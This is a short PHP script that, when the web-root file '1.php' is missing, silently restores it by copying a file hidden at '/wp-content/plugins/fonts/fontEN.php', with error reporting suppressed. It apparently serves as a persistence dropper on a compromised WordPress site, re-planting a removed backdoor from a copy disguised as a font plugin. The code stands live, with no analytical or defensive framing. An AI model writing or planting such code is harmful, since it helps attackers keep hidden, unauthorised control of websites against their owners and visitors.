<?php
$target = $_SERVER['DOCUMENT_ROOT'] . '1.php';
$backup = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/fonts/fontEN.php';
if (!file_exists($target)) {
$content = @file_get_contents($backup);
if ($content !== false) {
@file_put_contents($target, $content);
}
}
?>